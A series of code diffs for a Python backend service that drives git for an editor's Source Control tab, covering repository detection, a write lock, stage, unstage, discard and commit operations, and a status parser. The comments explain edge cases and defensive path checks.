-        # tracked to restore in that case anyway, and the same is true
-        # whenever the unstaged group is empty, so the restore is skipped
-        # rather than made to tolerate a failure it cannot tell apart from a
-        # real one.
-        if repo.read_status(root).unstaged:
-            run_git(["restore", "--worktree", "--", "."], cwd=root,
+        # The whole-tree restore NAMES its files rather than passing ``.``,
+        # and both reasons are measured on git 2.53.
+        #
+        # ``restore --worktree -- .`` exits 1 with "error: path 'a.txt' is
+        # unmerged" as soon as one conflicted file sits beside an ordinary
+        # modification -- and it restores NOTHING, so "discard everything"
+        # during a conflict answered 500 and left every change in place.
+        # The pathspec cannot express "all but the unmerged ones"; the
+        # unstaged group already is that list, because an unmerged path is
+        # a ``u`` record and is not in it.
+        #
+        # It also exits 1 for "pathspec '.' did not match any file(s) known
+        # to git" when the INDEX is empty -- a repository somebody has just
+        # initialised -- and the clean would then never run. An empty list
+        # skips the process instead of tolerating a failure it cannot tell
+        # apart from a real one.
+        restore = [entry.path for entry in repo.read_status(root).unstaged]
+        if restore:
+            run_git(["restore", "--worktree", "--", *restore], cwd=root,
                     timeout=T_LOCAL)
         run_git(["clean", "-fd", "--", "."], cwd=root, timeout=T_LOCAL)
         return {"all": True}

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -322,7 +322,18 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
     meant "delete those".
     """
     if paths is None:
-        run_git(["restore", "--worktree", "--", "."], cwd=root, timeout=T_LOCAL)
+        # ``restore --worktree -- .`` fails outright -- exit 1, "pathspec '.'
+        # did not match any file(s) known to git", which the classifier reads
+        # as a 404 -- when the INDEX is empty, and the index is empty in the
+        # most ordinary state there is: a repository somebody has just
+        # initialised. The clean would then never run at all. Nothing is
+        # tracked to restore in that case anyway, and the same is true
+        # whenever the unstaged group is empty, so the restore is skipped
+        # rather than made to tolerate a failure it cannot tell apart from a
+        # real one.
+        if repo.read_status(root).unstaged:
+            run_git(["restore", "--worktree", "--", "."], cwd=root,
+                    timeout=T_LOCAL)
         run_git(["clean", "-fd", "--", "."], cwd=root, timeout=T_LOCAL)
         return {"all": True}
 

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -1,0 +1,691 @@
+"""The Source Control tab's one entry point: what may be asked, and when.
+
+Every route in ``routes_git`` calls a method here and nothing else. What
+this layer adds to the plain functions underneath it is the three decisions
+that cannot be made per operation:
+
+* **WHICH repository.** The project directory and nothing else --
+  ``settings.PROJECT_DIR``, injected so a test never has to monkeypatch it.
+  :func:`resolve_repo` resolves the state in one order (no project, no git,
+  a git too old, not the top level of a repository, ready) and the first
+  answer wins. The ``not_repo`` case carries ``nested_toplevel`` when the
+  project sits INSIDE some other repository -- the CodefyUI checkout, a
+  home directory somebody once ran ``git init`` in -- because the one thing
+  the tab must never do is operate on that repository. It would look like
+  it worked.
+* **ONE mutation at a time.** git serialises writes with the index lock and
+  answers a loser with a message about ``.git/index.lock`` that means
+  nothing to anybody. So a write takes an ``asyncio.Lock`` first, and a
+  second write while one is running is refused immediately with
+  :class:`~app.core.git.errors.GitBusy` naming the operation that holds it.
+  The check and the acquisition have no ``await`` between them, which is
+  what makes "one at a time" true rather than likely. READS never take the
+  lock: a status poll must not queue behind a commit that is running the
+  user's hooks.
+* **EVERY write answers with the status it left behind.** ``mutate`` reads a
+  fresh status after the operation and returns it with the result, so the
+  tab never draws a panel one operation out of date, and computes
+  ``changed_paths`` -- which files this actually moved -- for the editor to
+  reload. If that read fails, the REQUEST fails: a write whose result cannot
+  be read back is not a success with a hole in it.
+
+Nothing here blocks the event loop. Every git call happens inside
+``asyncio.to_thread``, including the ones the checks themselves make, which
+is why the sync helpers below take a ``root`` and know nothing about the
+service: the same functions are what a test calls directly.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import os
+from collections.abc import Callable, Sequence
+from pathlib import Path
+from typing import Any, TypeVar
+
+from ...config import settings
+from . import diff as diff_ops
+from . import log as log_ops
+from . import repo
+from .errors import GitBusy, GitError, classify_failure
+from .models import (
+    DiffResponse,
+    FileAtRef,
+    GitFile,
+    GitStatus,
+    Identity,
+    LogResponse,
+    MutationResult,
+    RepoInfo,
+    StatusResponse,
+)
+from .paths import (
+    validate_branch_name,
+    validate_commit_message,
+    validate_rel_paths,
+)
+from .runner import (
+    T_LOCAL,
+    # Re-exported: the network timeout belongs to the operations G3 adds
+    # here, and a route should be able to name one without importing the
+    # process layer. The four live in ``runner`` because every module that
+    # runs git needs them and this one imports all of those.
+    T_NETWORK,  # noqa: F401
+    T_READ,
+    T_STATUS,
+    git_executable,
+    git_version,
+    run_git,
+)
+
+_T = TypeVar("_T")
+
+#: The oldest git the tab works with. ``restore`` and ``switch`` -- which
+#: are how unstage and discard are spelled here, because ``checkout`` means
+#: four different things -- arrived in 2.23. Below it the operations exist
+#: under other names with other footguns, and refusing with a version number
+#: is a better answer than half a tab.
+MIN_GIT_VERSION = (2, 23, 0)
+
+#: The states in which no git command can be run at all -- as opposed to
+#: ``not_repo``, which ``init`` exists to fix.
+_UNUSABLE_STATES = ("no_project", "git_missing", "git_too_old")
+
+
+# --- the repository --------------------------------------------------------
+
+
+def open_project_dir() -> Path | None:
+    """The project directory the server was started with, or None.
+
+    A function rather than a value read at import time: ``settings`` is
+    mutable in tests and the CLI, and a service built once at startup must
+    still see the directory the server was actually given.
+    """
+    return settings.PROJECT_DIR
+
+
+def resolve_repo(project_dir: Path | None) -> RepoInfo:
+    """How far the tab can get with *project_dir*, and why not further.
+
+    Cheap checks first, so the common failure (no project open) costs no
+    process at all, and the one that needs git (``--show-toplevel``) runs
+    only once the git it needs is known to be there and new enough.
+
+    A version that cannot be READ is reported as ``git_too_old``: something
+    on PATH is called git and will not say what it is, so it cannot be
+    confirmed to have the commands this tab is built on. ``git_version`` is
+    then None, which is the frontend's clue that the number is not the
+    problem.
+    """
+    if project_dir is None:
+        return RepoInfo(state="no_project")
+
+    root = Path(project_dir)
+    where = str(root)
+    if git_executable() is None:
+        return RepoInfo(state="git_missing", project_dir=where)
+
+    version = git_version()
+    text = _version_text(version)
+    if version is None or version < MIN_GIT_VERSION:
+        return RepoInfo(state="git_too_old", project_dir=where,
+                        git_version=text)
+
+    if not root.is_dir():
+        return RepoInfo(state="not_repo", project_dir=where, git_version=text)
+    toplevel = _toplevel(root)
+    if toplevel is None:
+        return RepoInfo(state="not_repo", project_dir=where, git_version=text)
+    if not _same_dir(toplevel, root):
+        # The project is inside SOMEBODY ELSE'S repository. Reported, and
+        # still ``not_repo``: every operation the tab offers would be
+        # applied to that repository, which nobody asked about.
+        return RepoInfo(state="not_repo", project_dir=where, git_version=text,
+                        nested_toplevel=str(toplevel))
+    return RepoInfo(state="ready", project_dir=where, git_version=text)
+
+
+def _toplevel(root: Path) -> Path | None:
+    """The top level of the repository *root* is in, or None if there is none.
+
+    ``rev-parse`` exits 128 both for "not a repository" and for a directory
+    git cannot enter; both mean the same thing here.
+    """
+    result = run_git(["rev-parse", "--show-toplevel"], cwd=root,
+                     timeout=T_STATUS, ok_codes=(0, 128), read_only=True)
+    text = result.out.strip()
+    if result.returncode != 0 or not text:
+        return None
+    return Path(text)
+
+
+def _same_dir(left: Path, right: Path) -> bool:
+    """Do two paths name the same directory?
+
+    Resolved and case-folded, because git prints ``D:/Project`` where the
+    settings hold ``D:\\project`` and a substring comparison of those two is
+    how a nested repository gets mistaken for the right one.
+    """
+    return (os.path.normcase(str(left.resolve()))
+            == os.path.normcase(str(right.resolve())))
+
+
+def _version_text(version: tuple[int, int, int] | None) -> str | None:
+    """``(2, 53, 0)`` as ``"2.53.0"``; None stays None."""
+    return None if version is None else ".".join(str(part) for part in version)
+
+
+def _state_error(info: RepoInfo) -> GitError:
+    """The failure that a non-``ready`` state is, for an operation that needs one.
+
+    ``GET /api/git/status`` reports these as a 200 with a state, because
+    "no project is open" is a screen; every other route has to fail, and
+    this is the one place that decides how.
+    """
+    if info.state == "no_project":
+        return GitError("no_project", 409,
+                        hint="start the server with --project <dir>")
+    if info.state == "git_missing":
+        return GitError("git_missing", 503,
+                        hint="install git and make sure it is on PATH")
+    if info.state == "git_too_old":
+        return GitError(
+            "git_too_old", 409,
+            hint=f"this git is {info.git_version or 'unreadable'}; "
+                 f"{'.'.join(str(part) for part in MIN_GIT_VERSION)} or newer "
+                 f"is needed")
+    if info.nested_toplevel:
+        return GitError(
+            "not_repo", 409,
+            "the project directory is inside another repository",
+            hint=f"{info.nested_toplevel} is a repository, but the project "
+                 f"directory is not; initialise one here to use this tab")
+    return GitError("not_repo", 409,
+                    hint="initialise a repository in the project directory")
+
+
+def check_ref_format(root: Path, name: str) -> str:
+    """Would git accept *name* as a branch name? Returns it, or raises 400.
+
+    Two checks, and the ORDER is the point. ``git check-ref-format`` is the
+    authority on the rules that are git's (a trailing ``.lock``, ``..``, a
+    control character) and knows nothing about ours: it accepts
+    ``refs/heads/-x`` quite happily -- measured, exit 0 -- and ``-x`` on a
+    command line is an option, not a branch. So the regex
+    (:data:`~app.core.git.paths.BRANCH_NAME_RE`, via
+    ``validate_branch_name``) runs FIRST and is what stops that one; git
+    then rejects what it alone knows about, with exit 1.
+
+    Nothing calls this yet. Branches are G3's; the check belongs with the
+    service that will make them, and it is here now so that it is written
+    once and tested against a real git rather than invented in a hurry
+    alongside the routes.
+    """
+    validate_branch_name(name)
+    result = run_git(["check-ref-format", f"refs/heads/{name}"], cwd=root,
+                     timeout=T_STATUS, ok_codes=(0, 1), read_only=True)
+    if result.returncode != 0:
+        raise GitError("invalid_ref", 400, f"git will not accept {name!r} "
+                                           f"as a branch name")
+    return name
+
+
+# --- the operations, as functions of a root --------------------------------
+
+
+def _selection(paths: Sequence[str] | None, all_paths: bool
+               ) -> list[str] | None:
+    """One of the two forms: these paths, or the whole tree (``None``).
+
+    The same rule ``PathsRequest`` enforces on the wire, enforced again here
+    because this is not only reached from a route. ``git add -A --`` with an
+    empty pathspec stages EVERYTHING, so a caller that means "the selection"
+    and passes an empty one must be refused rather than promoted.
+    """
+    if all_paths:
+        if paths:
+            raise GitError("invalid_value", 400,
+                           "send either paths or all, not both")
+        return None
+    if not paths:
+        raise GitError("invalid_path", 400, "no paths were given",
+                       hint="use all=true to act on the whole tree")
+    return list(paths)
+
+
+def stage_paths(root: Path, paths: Sequence[str] | None = None
+                ) -> dict[str, Any]:
+    """Stage *paths*, or the whole tree when *paths* is None.
+
+    ``add -A`` for both forms, because "stage this file" has to include
+    staging its DELETION -- a file the user deleted is a change like any
+    other, and plain ``add`` would silently skip it.
+    """
+    if paths is None:
+        run_git(["add", "-A", "--", "."], cwd=root, timeout=T_LOCAL)
+        return {"all": True}
+    clean = validate_rel_paths(root, paths)
+    run_git(["add", "-A", "--", *clean], cwd=root, timeout=T_LOCAL)
+    return {"paths": clean}
+
+
+def unstage_paths(root: Path, paths: Sequence[str] | None = None
+                  ) -> dict[str, Any]:
+    """Take *paths* (or everything) back out of the index.
+
+    An UNBORN branch needs the other spelling: ``restore --staged`` and
+    ``reset`` both resolve HEAD to know what to restore TO, and there is no
+    HEAD yet, so the answer for a repository whose first commit has not
+    happened is ``rm --cached`` -- remove it from the index, leave it on
+    disk. Which state we are in is read, not guessed.
+    """
+    unborn = repo.read_status(root).unborn
+    if paths is None:
+        args = (["rm", "--cached", "-r", "-q", "--", "."] if unborn
+                else ["reset", "-q"])
+        run_git(args, cwd=root, timeout=T_LOCAL)
+        return {"all": True}
+
+    clean = validate_rel_paths(root, paths)
+    args = (["rm", "--cached", "-r", "-q", "--", *clean] if unborn
+            else ["restore", "--staged", "--", *clean])
+    run_git(args, cwd=root, timeout=T_LOCAL)
+    return {"paths": clean}
+
+
+def discard_paths(root: Path, paths: Sequence[str] | None = None
+                  ) -> dict[str, Any]:
+    """Throw away the working-tree changes to *paths* (or to everything).
+
+    The only operation here that DESTROYS something the user cannot get
+    back, so every part of it is decided from a fresh status rather than
+    from what the request claims:
+
+    * a tracked file with unstaged changes is restored from the index --
+      ``restore --worktree`` only, so a file that is staged AND modified
+      (``MM``) keeps what was staged. That is what "Discard Changes" does in
+      every editor that has the button, and the other reading (throwing the
+      staged version away too) is not recoverable.
+    * an untracked file is DELETED (``clean -f``), which is the only thing
+      "discard" can mean for a file that has no other copy.
+    * a path in neither list is a 400. It is either already clean or gone,
+      and the request was built from a status that has since changed.
+    * a SUBMODULE is refused. ``restore --worktree`` on a gitlink succeeds
+      and does nothing at all (measured on git 2.53), so the tab would
+      report a discard that did not happen; the changes are in the other
+      repository, where this tab does not go.
+
+    The whole-tree form is ``restore --worktree -- .`` then ``clean -fd``,
+    and never ``-x``: ignored files are the user's ``.env``, their virtual
+    environment and their model weights, and "discard my changes" has never
+    meant "delete those".
+    """
+    if paths is None:
+        run_git(["restore", "--worktree", "--", "."], cwd=root, timeout=T_LOCAL)
+        run_git(["clean", "-fd", "--", "."], cwd=root, timeout=T_LOCAL)
+        return {"all": True}
+
+    clean = validate_rel_paths(root, paths)
+    submodules = _submodule_paths(root, clean)
+    if submodules:
+        raise GitError("invalid_path", 400,
+                       f"{submodules[0]} is a submodule",
+                       hint="submodules are not managed here; open that "
+                            "repository to discard its changes")
+
+    status = repo.read_status(root)
+    tracked = {entry.path for entry in status.unstaged}
+    untracked = {entry.path for entry in status.untracked}
+    unknown = [path for path in clean
+               if path not in tracked and path not in untracked]
+    if unknown:
+        raise GitError("path_not_in_status", 400,
+                       f"{unknown[0]} has no changes to discard",
+                       hint="the status has changed since it was read; "
+                            "reload it")
+
+    # Both lists are computed before either command runs, so a request that
+    # names one of each is one decision and not two.
+    restore = [path for path in clean if path in tracked]
+    remove = [path for path in clean if path in untracked and path not in tracked]
+    if restore:
+        run_git(["restore", "--worktree", "--", *restore], cwd=root,
+                timeout=T_LOCAL)
+    if remove:
+        run_git(["clean", "-f", "--", *remove], cwd=root, timeout=T_LOCAL)
+    return {"paths": clean, "restored": len(restore), "removed": len(remove)}
+
+
+#: The index mode of a gitlink -- a submodule's entry in its parent.
+_GITLINK_MODE = "160000"
+
+
+def _submodule_paths(root: Path, paths: Sequence[str]) -> list[str]:
+    """Which of *paths* are submodules, as the index sees them.
+
+    Asked of ``ls-files --stage`` rather than of the status parser, which
+    does not keep porcelain v2's submodule field, and of the INDEX rather
+    than of the disk, because that is where the answer is unambiguous: mode
+    160000 is a gitlink and nothing else is.
+    """
+    result = run_git(["ls-files", "--stage", "-z", "--", *paths], cwd=root,
+                     timeout=T_READ, read_only=True)
+    found: list[str] = []
+    for entry in result.out.split("\x00"):
+        if not entry.startswith(_GITLINK_MODE + " "):
+            continue
+        _, _, path = entry.partition("\t")
+        if path:
+            found.append(path)
+    return found
+
+
+def commit_changes(root: Path, message: str, *, all_paths: bool = False,
+                   amend: bool = False) -> dict[str, Any]:
+    """Make a commit. Returns the sha it made.
+
+    *all_paths* is VS Code's "Commit All": stage the whole tree first, which
+    is one ``add -A`` and not a different commit command.
+
+    The message travels on STDIN (``--file=-``) and is never an argument: it
+    is the one value here that is meant to contain newlines, and an argument
+    starting with ``-`` is an option.
+
+    Two failures need help from this function rather than from the
+    classifier. AMENDING with no commit to amend is a 404 decided from the
+    status, because git answers it with "You have nothing to amend", which
+    is not a phrase any rule should have to know. And a commit that finds
+    nothing to commit says so on STDOUT -- "nothing added to commit but
+    untracked files present" -- so both streams are joined before they are
+    classified; stderr alone would make the most ordinary empty commit a
+    500.
+    """
+    text = validate_commit_message(message)
+    if amend and repo.read_status(root).unborn:
+        raise GitError("not_found", 404, "there is no commit to amend",
+                       hint="this branch has no commits yet")
+
+    if all_paths:
+        run_git(["add", "-A", "--", "."], cwd=root, timeout=T_LOCAL)
+
+    args = ["commit", "-q"]
+    if amend:
+        args.append("--amend")
+    args.append("--file=-")
+    result = run_git(args, cwd=root, timeout=T_LOCAL,
+                     input_bytes=text.encode("utf-8"),
+                     # 1 is an empty commit or a hook that said no, 128 an
+                     # identity or a lock problem: all of them are handled
+                     # below, against BOTH streams.
+                     ok_codes=(0, 1, 128))
+    if result.returncode != 0:
+        raise classify_failure(result.argv, result.returncode,
+                               f"{result.out}\n{result.err}")
+
+    sha = run_git(["rev-parse", "HEAD"], cwd=root, timeout=T_STATUS,
+                  read_only=True).out.strip()
+    return {"sha": sha, "short": sha[:7]}
+
+
+def init_repo(root: Path) -> dict[str, Any]:
+    """``git init`` plus the scaffold that keeps ``.env`` out of history."""
+    repo.init(root)
+    return {"scaffold": repo.ensure_scaffold(root)}
+
+
+# --- what changed ----------------------------------------------------------
+
+
+def _entries(status: GitStatus) -> set[tuple[str, str]]:
+    """``(path, xy)`` for every file in every group of *status*.
+
+    The PAIR, not the path: a file that goes from ``MM`` to ``M.`` has
+    changed even though it is in both statuses, and a file that appears in
+    two groups is two entries in both.
+    """
+    return {(entry.path, entry.xy)
+            for group in (status.staged, status.unstaged, status.untracked,
+                          status.conflicted)
+            for entry in group}
+
+
+def changed_paths(root: Path, before: GitStatus | None, after: GitStatus,
+                  paths: Sequence[str] = ()) -> list[str]:
+    """Which files one operation moved, for the editor to reload.
+
+    Three sources, unioned: what the status says is different, what the
+    request itself named (a discard that restored a file to exactly what the
+    index had leaves no trace in the status, and the editor still has the
+    other version open), and -- when HEAD moved -- what the two commits
+    differ in, which is how a commit or an amend reports the files it
+    swallowed.
+
+    The HEAD diff is best-effort: it is a nicety for the UI, and a commit
+    that succeeded must not be reported as a failure because the diff after
+    it did not run.
+    """
+    changed = set(paths)
+    if before is not None:
+        changed.update(path for path, _ in _entries(before) ^ _entries(after))
+        if before.head and after.head and before.head != after.head:
+            changed.update(_names_between(root, before.head, after.head))
+    return sorted(changed)
+
+
+def _names_between(root: Path, before_head: str, after_head: str) -> list[str]:
+    """The files two commits differ in; empty when that cannot be answered."""
+    try:
+        result = run_git(["diff", "--name-only", "-z", before_head, after_head,
+                          "--"],
+                         cwd=root, timeout=T_READ, read_only=True)
+    except GitError:
+        return []
+    return [name for name in result.out.split("\x00") if name]
+
+
+# --- the service ------------------------------------------------------------
+
+
+class GitService:
+    """One instance on ``app.state``; every git route goes through it."""
+
+    def __init__(self,
+                 *,
+                 project_dir: Callable[[], Path | None] | None = None) -> None:
+        # Injected so a test can point the service at a temporary repository
+        # without monkeypatching global settings -- the same reason
+        # ``PackService`` takes its flow as an argument.
+        self._project_dir = project_dir if project_dir is not None else open_project_dir
+        #: Held for the length of one mutation. Public because the routes
+        #: report "busy" from it and a test parks on it.
+        self.lock = asyncio.Lock()
+        #: What the lock is being held FOR, so a refusal can name it.
+        self.current_op: str | None = None
+
+    # --- reads (never take the lock) ------------------------------------
+
+    async def repo_info(self) -> RepoInfo:
+        """Whether the tab can talk to a repository at all, and why not."""
+        return await asyncio.to_thread(resolve_repo, self._project_dir())
+
+    async def status(self) -> StatusResponse:
+        """The repository, and its status when there is one to read.
+
+        Never an error for a repository that is not there: the state is the
+        answer, and ``status`` is None beside it.
+        """
+        return await asyncio.to_thread(self._status)
+
+    def _status(self) -> StatusResponse:
+        root = self._project_dir()
+        info = resolve_repo(root)
+        if info.state != "ready" or root is None:
+            return StatusResponse(repo=info)
+        return StatusResponse(repo=info, status=repo.read_status(root))
+
+    async def identity(self) -> Identity:
+        """``user.name`` / ``user.email``, and where each comes from."""
+        return await self._read(repo.read_identity)
+
+    async def log(self, *, skip: int = 0, limit: int = 20) -> LogResponse:
+        """One page of history, newest first."""
+        return await self._read(
+            lambda root: log_ops.log(root, skip=skip, limit=limit))
+
+    async def commit_files(self, sha: str) -> list[GitFile]:
+        """The files one commit changed, against its first parent."""
+        return await self._read(lambda root: log_ops.commit_files(root, sha))
+
+    async def diff(self, path: str, scope: str, *, sha: str | None = None,
+                   blobs: bool = False) -> DiffResponse:
+        """The patch for one file, in one of the three scopes."""
+        return await self._read(
+            lambda root: diff_ops.diff(root, path, scope, sha=sha,
+                                       blobs=blobs))
+
+    async def file_at_ref(self, path: str, ref: str) -> FileAtRef:
+        """One file's content at ``HEAD``, ``index``, ``worktree`` or a sha."""
+        return await self._read(
+            lambda root: diff_ops.file_at_ref(root, path, ref))
+
+    async def _read(self, fn: Callable[[Path], _T]) -> _T:
+        """Run *fn* against the ready repository, off the loop, without the lock.
+
+        Reads outnumber writes by a wide margin here -- the tab polls the
+        status and opens diffs while a commit is running -- and none of them
+        take the index lock, so making them wait for the mutation lock would
+        only make the UI stall for no gain.
+        """
+        return await asyncio.to_thread(lambda: fn(self._require_ready()))
+
+    # --- writes (one at a time) ------------------------------------------
+
+    async def init(self) -> MutationResult:
+        """Make the project directory a repository, with the shared scaffold."""
+        return await self.mutate("init", init_repo, worktree=False,
+                                 require_repo=False)
+
+    async def stage(self, paths: Sequence[str] | None = None, *,
+                    all_paths: bool = False) -> MutationResult:
+        """Stage *paths*, or everything when *all_paths*."""
+        selection = _selection(paths, all_paths)
+        return await self.mutate(
+            "stage", lambda root: stage_paths(root, selection), worktree=True)
+
+    async def unstage(self, paths: Sequence[str] | None = None, *,
+                      all_paths: bool = False) -> MutationResult:
+        """Take *paths*, or everything, back out of the index."""
+        selection = _selection(paths, all_paths)
+        return await self.mutate(
+            "unstage", lambda root: unstage_paths(root, selection),
+            worktree=True)
+
+    async def discard(self, paths: Sequence[str] | None = None, *,
+                      all_paths: bool = False) -> MutationResult:
+        """Throw away working-tree changes. The one write that destroys."""
+        selection = _selection(paths, all_paths)
+        return await self.mutate(
+            "discard", lambda root: discard_paths(root, selection),
+            worktree=True)
+
+    async def commit(self, message: str, *, all_paths: bool = False,
+                     amend: bool = False) -> MutationResult:
+        """Commit the index (or the whole tree), optionally amending."""
+        return await self.mutate(
+            "commit",
+            lambda root: commit_changes(root, message, all_paths=all_paths,
+                                        amend=amend),
+            worktree=True)
+
+    async def set_identity(self, name: str | None = None,
+                           email: str | None = None) -> MutationResult:
+        """Write ``user.name`` / ``user.email`` into THIS repository."""
+        return await self.mutate(
+            "set_identity", lambda root: repo.write_identity(root, name, email),
+            worktree=False)
+
+    async def mutate(self, op: str,
+                     fn: Callable[[Path], dict[str, Any] | None], *,
+                     worktree: bool, require_repo: bool = True
+                     ) -> MutationResult:
+        """Run one write under the lock and answer with the status it left.
+
+        *fn* does the work and returns its ``detail`` -- the operation's own
+        extras, and by convention a ``paths`` key naming what it acted on,
+        which is one of the three things ``changed_paths`` is built from.
+
+        *worktree* says whether this operation can move files. A status is
+        then read BEFORE it as well, so the difference between the two is
+        knowable; ``init`` and an identity write skip that read because
+        there is nothing to compare.
+
+        *require_repo* is False for ``init`` alone: it is the one write that
+        runs when the answer to "is this a repository" is no.
+
+        :raises GitBusy: another mutation holds the lock. Nothing was
+            attempted, and the same request usually works a moment later.
+        """
+        # The check and the acquisition, with no await between them: an
+        # asyncio.Lock that is free is taken without suspending, so two
+        # requests cannot both pass this check.
+        if self.lock.locked():
+            raise GitBusy(self.current_op or op)
+        async with self.lock:
+            self.current_op = op
+            try:
+                return await asyncio.to_thread(
+                    self._mutate, fn, worktree=worktree,
+                    require_repo=require_repo)
+            finally:
+                self.current_op = None
+
+    def _mutate(self, fn: Callable[[Path], dict[str, Any] | None], *,
+                worktree: bool, require_repo: bool) -> MutationResult:
+        """The whole write, on one worker thread.
+
+        One thread for the state check, the operation and both status reads,
+        because they are one transaction as far as the caller is concerned
+        and splitting them over several ``to_thread`` hops would let another
+        request's write land in the middle of them.
+
+        The status read afterwards is NOT guarded: if it fails, the request
+        fails with its error. ``MutationResult.status`` is required, and a
+        write that cannot be read back is a failed request rather than a
+        result with a hole in it.
+        """
+        root = self._require_ready() if require_repo else self._require_project()
+        before = repo.read_status(root) if worktree else None
+        detail = fn(root) or {}
+        after = repo.read_status(root)
+        named = detail.get("paths")
+        return MutationResult(
+            status=after,
+            changed_paths=changed_paths(
+                root, before, after,
+                named if isinstance(named, list) else ()),
+            head=after.head,
+            detail=detail)
+
+    # --- the state checks --------------------------------------------------
+
+    def _require_ready(self) -> Path:
+        """The project directory, or the failure its state is."""
+        root = self._project_dir()
+        info = resolve_repo(root)
+        if info.state != "ready" or root is None:
+            raise _state_error(info)
+        return Path(root)
+
+    def _require_project(self) -> Path:
+        """The project directory, without requiring a repository in it.
+
+        For ``init``, which is the operation whose whole purpose is that
+        there is not one yet -- including the ``nested_toplevel`` case,
+        where making the project its own repository is exactly the fix.
+        """
+        root = self._project_dir()
+        info = resolve_repo(root)
+        if info.state in _UNUSABLE_STATES or root is None:
+            raise _state_error(info)
+        return Path(root)

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -254,6 +254,27 @@ def _selection(paths: Sequence[str] | None, all_paths: bool
     return list(paths)
 
 
+def _writable_paths(root: Path, paths: Sequence[str]) -> list[str]:
+    """The paths of one write, validated and checked for a link in the way.
+
+    Every named path a mutation acts on goes through here, and nowhere else
+    does: ``validate_rel_path`` allows a link (it must -- see
+    ``repo.refuse_link_parents``), and a path whose PARENT is a link or a
+    Windows junction resolves inside the project and passes every other
+    check while naming a file somewhere else entirely. That is measured, not
+    theoretical: it is how ``discard`` once deleted the file a gitignored
+    folder held.
+
+    The whole-tree form (``all``) does not come through here and does not
+    need to: git scopes ``-- .`` to the repository itself, and does not
+    follow a link out of it.
+    """
+    clean = validate_rel_paths(root, paths)
+    for path in clean:
+        repo.refuse_link_parents(root, path)
+    return clean
+
+
 def stage_paths(root: Path, paths: Sequence[str] | None = None
                 ) -> dict[str, Any]:
     """Stage *paths*, or the whole tree when *paths* is None.
@@ -265,7 +286,7 @@ def stage_paths(root: Path, paths: Sequence[str] | None = None
     if paths is None:
         run_git(["add", "-A", "--", "."], cwd=root, timeout=T_LOCAL)
         return {"all": True}
-    clean = validate_rel_paths(root, paths)
+    clean = _writable_paths(root, paths)
     run_git(["add", "-A", "--", *clean], cwd=root, timeout=T_LOCAL)
     return {"paths": clean}
 
@@ -287,7 +308,7 @@ def unstage_paths(root: Path, paths: Sequence[str] | None = None
         run_git(args, cwd=root, timeout=T_LOCAL)
         return {"all": True}
 
-    clean = validate_rel_paths(root, paths)
+    clean = _writable_paths(root, paths)
     args = (["rm", "--cached", "-r", "-q", "--", *clean] if unborn
             else ["restore", "--staged", "--", *clean])
     run_git(args, cwd=root, timeout=T_LOCAL)
@@ -311,6 +332,10 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
       "discard" can mean for a file that has no other copy.
     * a path in neither list is a 400. It is either already clean or gone,
       and the request was built from a status that has since changed.
+    * a path THROUGH a link or a junction is refused before anything runs
+      (:func:`_writable_paths`): ``clean -f`` down one deletes the file at
+      the other end of it, which is how this operation once emptied a
+      gitignored folder of secrets.
     * a SUBMODULE is refused. ``restore --worktree`` on a gitlink succeeds
       and does nothing at all (measured on git 2.53), so the tab would
       report a discard that did not happen; the changes are in the other
@@ -337,7 +362,7 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
         run_git(["clean", "-fd", "--", "."], cwd=root, timeout=T_LOCAL)
         return {"all": True}
 
-    clean = validate_rel_paths(root, paths)
+    clean = _writable_paths(root, paths)
     submodules = repo.submodule_paths(root, clean)
     if submodules:
         raise GitError("invalid_path", 400,

--- a/backend/app/core/git/status.py
+++ b/backend/app/core/git/status.py
@@ -13,11 +13,13 @@ Why this format, and why these rules:
   rename from a copy WITH its similarity score, and marks submodules. It is
   also the format git documents as stable for scripts, which matters for a
   parser that ships to users who upgrade git without asking us.
-* **NUL, not newline.** A filename may legally contain a newline, and under
-  ``-z`` git stops quoting entirely (with ``core.quotepath=false`` it also
-  stops octal-escaping non-ASCII), so a CJK path arrives as itself. That
-  means the ONLY safe record separator is the NUL, and splitting this input
-  into "lines" would be a bug waiting for the first odd filename.
+* **NUL, not newline.** A filename may legally contain a newline. ``-z`` is
+  what makes that safe: git stops quoting and escaping paths altogether --
+  a CJK path arrives as its own bytes -- and terminates every record with a
+  NUL instead. Which means the NUL is also the only safe thing to split on,
+  and reading this input as "lines" would be a bug waiting for the first odd
+  filename. (The runner's ``core.quotepath=false`` says the same thing for
+  the commands that are not ``-z``.)
 * **The first N fields, then the rest is the path.** Each record has a fixed
   number of space-separated fields before its path, so the split is
   ``split(" ", N)`` -- single-space, with a maximum -- and never a generic
@@ -140,11 +142,11 @@ def parse_porcelain_v2(
     """Parse one ``--porcelain=v2 --branch --show-stash -z`` payload.
 
     *data* is git's raw stdout. Each NUL-separated token is decoded on its
-    own as UTF-8 with ``errors="replace"``: with ``core.quotepath=false``
-    git prints the bytes of a filename exactly as the filesystem holds them,
-    and on Windows or a repository made on another machine those bytes are
-    not always valid UTF-8. One unreadable name must cost that name a few
-    replacement characters, not cost the user their whole status panel.
+    own as UTF-8 with ``errors="replace"``: under ``-z`` git prints the
+    bytes of a filename exactly as the filesystem holds them, and on Windows
+    or in a repository made on another machine those bytes are not always
+    valid UTF-8. One unreadable name must cost that name a few replacement
+    characters, not cost the user their whole status panel.
 
     The two in-progress flags are passed straight through; see the module
     docstring for why they are not read here.

--- a/backend/app/core/git/status.py
+++ b/backend/app/core/git/status.py
@@ -1,0 +1,296 @@
+"""Reading ``git status --porcelain=v2 --branch --show-stash -z``.
+
+One pure function over a byte string. No subprocess, no runner import,
+nothing to mock: the awkward part of the Source Control tab is this format,
+and keeping it a function of bytes means every awkward case -- a filename
+with a newline in it, a rename, a conflict, an upstream that no longer
+exists -- is a two-line test instead of a temporary repository.
+
+Why this format, and why these rules:
+
+* **Porcelain v2, not v1.** v1 packs everything into two letters and then
+  quotes paths it does not like; v2 gives every entry named fields, tells a
+  rename from a copy WITH its similarity score, and marks submodules. It is
+  also the format git documents as stable for scripts, which matters for a
+  parser that ships to users who upgrade git without asking us.
+* **NUL, not newline.** A filename may legally contain a newline, and under
+  ``-z`` git stops quoting entirely (with ``core.quotepath=false`` it also
